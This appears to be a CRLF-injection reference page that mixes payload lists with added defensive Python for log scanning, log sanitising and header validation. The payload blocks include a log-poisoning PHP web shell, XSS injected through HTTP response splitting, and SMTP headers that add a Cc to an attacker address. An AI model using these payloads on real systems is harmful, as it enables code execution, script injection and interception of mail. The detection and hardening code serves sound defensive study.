# CRLF injection

| Description          | Character | ASCII (Dec) | Hex    | URL encoded |
| -------------------- | -------- | ----------- | ------ | ----------- |
| Carriage Return (CR) | \r       | 13          | 0x0D   | %0D         |
| Line Feed (LF)       | \n       | 10          | 0x0A   | %0A         |
| CRLF                 | \r\n     | 13 10       | 0x0D0A | %0D%0A      |
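The encodings in the table are exactly what a detection rule has to recognise when reviewing web-server logs. As an added example that is not part of the original page, the following Python decodes the request target of a few constructed access-log lines (plain, `%0D%0A` and double-encoded `%250d%250a` variants) and flags every request that contains a raw CR or LF after decoding; the IP addresses, paths and timestamps are made up for the demo.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (combined-log style) for this demo.
# The IPs, paths and timestamps are made up and do not come from a real server.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /search?q=shoes HTTP/1.1" 200 512
203.0.113.7 - - [10/Oct/2023:13:55:40 +0000] "GET /redirect?url=%2Fhome%0D%0ASet-Cookie%3A+x%3D1 HTTP/1.1" 302 0
203.0.113.9 - - [10/Oct/2023:13:55:44 +0000] "GET /redirect?url=%2Fhome%250d%250aX-Test%3A+1 HTTP/1.1" 302 0
203.0.113.4 - - [10/Oct/2023:13:55:50 +0000] "GET /about HTTP/1.1" 200 2048
"""

# Request line inside the quotes: method, target, protocol.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def decode_fully(value, max_rounds=3):
    """Percent-decode repeatedly (bounded) so %250d%250a is seen as CRLF too."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def has_crlf(value):
    """True if the decoded value contains a raw CR (0x0D) or LF (0x0A)."""
    decoded = decode_fully(value)
    return "\r" in decoded or "\n" in decoded


def find_crlf_attempts(log_text):
    """Return one record per log line whose request target decodes to CR/LF."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        m = REQUEST_RE.search(line)
        if m is None:
            continue
        target = m.group("target")
        if has_crlf(target):
            hits.append({
                "line": lineno,
                "client": line.split(" ", 1)[0],
                "target": target,
                "decoded": decode_fully(target),
            })
    return hits


if __name__ == "__main__":
    for hit in find_crlf_attempts(SAMPLE_LOG):
        print(f"line {hit['line']}: {hit['client']} -> {hit['decoded']!r}")
```

Decoding in a bounded loop matters: a rule that only matches the literal string `%0D%0A` misses the double-encoded request on the third line, which a server that decodes twice (or a proxy plus the application) turns into a real CRLF.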

## Log injection

```sh
# Log poisoning
%0D%0A<?php system($_GET['cmd']); ?>
```
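The injected CRLF works because the logger writes the untrusted value verbatim, so everything after the line break looks like a separate, legitimate entry. As an added example that is not part of the original page, the following Python contrasts a vulnerable login logger with one that escapes CR, LF and other control characters before writing; the forged username is constructed for the demo.

```python
import io
import re

# CR, LF and the other C0 control characters (plus DEL) can break a line-oriented
# log; HTAB is kept because it is harmless in a log line.
_CONTROL_CHARS = re.compile(r"[\x00-\x08\x0a-\x1f\x7f]")


def sanitize_for_log(value):
    """Escape control characters so an attacker-supplied string stays on one line."""
    def _escape(match):
        ch = match.group(0)
        return {"\r": "\\r", "\n": "\\n"}.get(ch, "\\x%02x" % ord(ch))
    return _CONTROL_CHARS.sub(_escape, value)


def log_login_unsafe(sink, user, ok):
    # Vulnerable: the username is written verbatim, so a CRLF inside it starts
    # a new entry that readers and parsers cannot tell from a real one.
    sink.write(f"login user={user} result={'ok' if ok else 'fail'}\n")


def log_login_safe(sink, user, ok):
    # Hardened: untrusted fields are escaped before they reach the log line.
    sink.write(f"login user={sanitize_for_log(user)} result={'ok' if ok else 'fail'}\n")


def demo(user, ok=False):
    """Return (unsafe_lines, safe_lines) produced for one login attempt."""
    unsafe, safe = io.StringIO(), io.StringIO()
    log_login_unsafe(unsafe, user, ok)
    log_login_safe(safe, user, ok)
    return unsafe.getvalue().splitlines(), safe.getvalue().splitlines()


# Constructed input: a username that carries CRLF followed by a forged entry.
FORGED_USER = "alice\r\nlogin user=admin result=ok"

if __name__ == "__main__":
    for label, lines in zip(("unsafe", "safe"), demo(FORGED_USER)):
        print(label, lines)
```

With the forged username the unsafe logger emits two lines, the second reading like a successful admin login; the safe logger emits one line in which the CRLF is visible as `\r\n`. Structured (JSON) logging achieves the same effect because the encoder escapes control characters for you.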

## HTTP response splitting

```sh
# HTTP header
%0D%0AHeader-Test: value-test
# XSS
%0D%0A%0D%0A<html><script>alert(1)</script></html>
# HTTP header Content-Type + XSS
%0D%0AContent-Type: text/html%0D%0A%0D%0A<html><script>alert(1)</script></html>
```

## SMTP header injection

```sh
# SMTP header
%0D%0AHeader-Test: value-test
# URL-encoded variant (space as +)
%0D%0AHeader-Test:+value-test

# SMTP header Cc
%0D%0ACc: email@attacker.com
%0D%0ACc: email@attacker.com%0D%0ADoesNotExist: True
# URL-encoded variant (space as +, @ as %40)
%0D%0ACc:+email%40attacker.com
%0D%0ACc:+email%40attacker.com%0D%0ADoesNotExist:+True
```
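The HTTP response-splitting and SMTP header-injection payloads above work for the same reason: a header value that reaches the serialiser verbatim can terminate the current header line, and whatever follows is parsed as a new header. As an added example that is not part of the original page, the following Python contrasts a naive header renderer with one that validates names and values before serialising, and uses a small receiver-side parser to show the injected `Set-Cookie` and `Cc` headers appearing in the naive output; the header sets are constructed.

```python
import re

# RFC 7230 token characters, the only ones allowed in a header name.
_TOKEN = re.compile(r"^[!#$%&'*+\-.^_`|~0-9A-Za-z]+$")
# CR, LF and other control characters are never allowed in a value (HTAB is tolerated).
_CONTROL = re.compile(r"[\x00-\x08\x0a-\x1f\x7f]")


def check_header(name, value):
    """Raise ValueError if the name or value could terminate or split a header line."""
    if not _TOKEN.match(name):
        raise ValueError(f"illegal header name: {name!r}")
    if _CONTROL.search(value):
        raise ValueError(f"control character in header {name}: {value!r}")


def render_headers_unsafe(headers):
    # Vulnerable: values are concatenated verbatim, so an embedded CRLF ends the
    # current header and whatever follows becomes a new one.
    return "".join(f"{k}: {v}\r\n" for k, v in headers.items()) + "\r\n"


def render_headers_safe(headers):
    # Hardened: every name/value pair is validated before it is serialised.
    for k, v in headers.items():
        check_header(k, v)
    return render_headers_unsafe(headers)


def is_rejected(headers):
    """True if the hardened renderer refuses this header set."""
    try:
        render_headers_safe(headers)
    except ValueError:
        return True
    return False


def parse_headers(raw):
    """Split a header block the way a receiver does: one header per CRLF-delimited line."""
    parsed = []
    for line in raw.split("\r\n"):
        if not line:  # the empty line ends the header block
            break
        name, _, value = line.partition(":")
        parsed.append((name.strip(), value.strip()))
    return parsed


# Constructed inputs: a redirect target and a mail recipient carrying CRLF.
HTTP_LOCATION_INJECTED = "/home\r\nSet-Cookie: session=attacker"
SMTP_TO_INJECTED = "bob@example.com\r\nCc: third@example.net"

if __name__ == "__main__":
    print(parse_headers(render_headers_unsafe({"Location": HTTP_LOCATION_INJECTED})))
    print(parse_headers(render_headers_unsafe({"To": SMTP_TO_INJECTED})))
    print("rejected:", is_rejected({"To": SMTP_TO_INJECTED}))
```

The check belongs at the point where untrusted data becomes a header, not in a filter on the request: the same validation covers `Location`, `Set-Cookie`, `To` and `Cc` alike, and mature libraries already do it (Python's `http.client`, for instance, raises `ValueError` on a header value containing a bare CR or LF).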

## Tools

### CRLFsuite

* <https://github.com/Raghavd3v/CRLFsuite>

```sh
# Quote the URL: an unquoted & would otherwise background the command in the shell
crlfsuite -t "http://<target>/?param1=value1&param2=value2"
```
